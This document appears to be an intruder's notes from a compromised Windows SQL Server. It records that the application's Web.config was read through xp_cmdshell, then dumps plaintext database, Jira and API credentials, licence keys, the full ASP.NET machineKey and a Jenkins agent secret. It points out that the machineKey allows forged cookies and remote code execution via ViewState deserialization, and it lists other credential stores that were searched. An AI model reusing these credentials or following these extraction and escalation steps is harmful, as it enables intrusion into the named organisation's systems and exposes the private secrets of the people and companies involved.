# SECRETS FROM Web.config — D:\i21App\2210CherryEnergyUAP1\Web.config

Extraction date: 2026-09-16. Method: `xp_cmdshell 'type D:\i21App\2210CherryEnergyUAP1\Web.config'` via SQL.
DB inside: CherryEnergyUAP01 (mounted as 2210CherryEnergyUAP1).

## Connection strings (plaintext credentials)

| Name | ConnectionString |
|---|---|
| Hangfire | `Data Source=U22930128\SQL2022;Initial Catalog=i21Hangfire;User ID=irely;Password=iRely486;MultipleActiveResultSets=True` |
| 01 | `Data Source=U22930128\SQL2022;Initial Catalog=CHERRYENERGYUAP01;User ID=irely;Password=iRely486;MultipleActiveResultSets=True` |

## API keys / secrets (plaintext)

| Key | Value | Purpose |
|---|---|---|
| **GoogleSiteKey** | `6Le5hkwUAAAAAKBDYSNqaAhTStSy2brIxy7aOPqM` | reCAPTCHA site key |
| **GoogleSecretKey** | `6Le5hkwUAAAAAHW_pX_LORu7JzwYO1qI6Phl50ir` | reCAPTCHA **secret key** |
| **APINinjaKey** | `iSfvOKUikZDs5/E8irU8PQ==NlhoUfZshJZ5dBVJ` | API Ninja (api.api-ninjas.com) |
| **jirausername** | `help.desk` | Jira login |
| **jirapassword** | `iRely$1126` | **Jira password in plaintext** |
| **foxit.licensekey** | `FGN20NPDGG7MLBdV8b8VkcUFnXqN/fZhQsG3uRHGiWEemmLVtPXlPUv1JUiSQjcjOvXR8x7mknNu4Zqghu7R7c8vlH/bgZPcQKXg` | Foxit PDF licence |
| **mailbeelicense** | `MN100-75BD4234BD36BD43BD1230BAAB81-F956` | Mailbee licence |
| **AzureAIInstrumentationKey** | `2824d903-299d-473b-a4ed-f8a6a8850edf` (commented out) | App Insights |

## machineKey (critical for ASP.NET exploitation)

| Field | Value |
|---|---|
| **decryption** | AES |
| **decryptionKey** | `304DCCF3428FB1D39BCBCED801804B829F5BCD4D0E46A0E923AEFD427D9026E7` |
| **validation** | HMACSHA256 |
| **validationKey** | `632EF20769E89AD1EEF7C18D3AAFFDC07B8D8241A1DAD922C27FFCC57F0A16DAC26AB5C4DF83CEE7289615849BE8FF369A41...` |

**machineKey allows**: forging an ASP.NET authentication cookie / ViewState → **RCE via deserialization** (ysoserial.net, BinaryFormatter). This is a critical vulnerability if IIS is accessible.

## Azure AD (empty values — not configured)

| Key | Value |
|---|---|
| AzureADEnabled | false |
| AzureADClientId | (empty) |
| AzureADAppSecret | (empty) |
| AzureADTenant | (empty) |

## Other settings

| Key | Value | What for |
|---|---|---|
| BCUserAPI | `http://i21server.com/iGuide/BizCoreAPI/` | API endpoint (internal) |
| BCValidate | `http://iguide.summit-soft.com/iGuideWebServices_5.202/Dashboard/` | validation (external!) |
| bizcoreURL | `http://i21server.com/bizcore/` | bizcore (internal) |
| iGuideWebURL | `http://iguide.irely.com/iGuideClientAPI14.3/` | iGuide (external, irely.com) |
| SSLEnabled | false | **SSL disabled** |
| ADEnabled | false | AD auth disabled |
| CCProduction | false | not production-CC |
| Company | 03 | company number in the COBOL system |
| Computer | localhost:5700 | AcuServer COBOL on 5700 |
| Alias | senchacobol | COBOL alias |

## Conclusion on Jenkins creds

Jenkins controller — **on a separate host** `jenkins.irelyserver.com` (found in `C:\JenkinsNode\JenkinsAgent.bat` and `jenkins-slave.xml`). This SQL server is merely a Jenkins agent (node `JenkinsMobileTest05`), its secret:
`9d559bebfaa87c53005060464f48d00e48b1ab9c3a808ab6e7cbeede841b2dcc`

Credentials.xml / master.key / hudson.util.Secret — **are on the controller host** `jenkins.irelyserver.com`, not here. They're not on this server.

## What was NOT found (searched for)
- `D:\Automation\.git` — Test_Framework git repo, STALE since 11/2024, no creds
- `C:\Users\*\.git-credentials` / `.ssh` / `.gitconfig` — ACL blocks (MSSQL$SQL2022 has no access to user profiles)
- msdb credentials/proxies/mail — empty (see SECRETS_FROM_MASTER_MSDB.md)
- Workspace `C:\JenkinsNode\workspace\*` — empty folders without .xml/.json/.config
- `C:\JenkinsNode\caches` — only durable-task cache
- `C:\JenkinsNode\remoting\jarCache` — Java JAR cache, no secrets
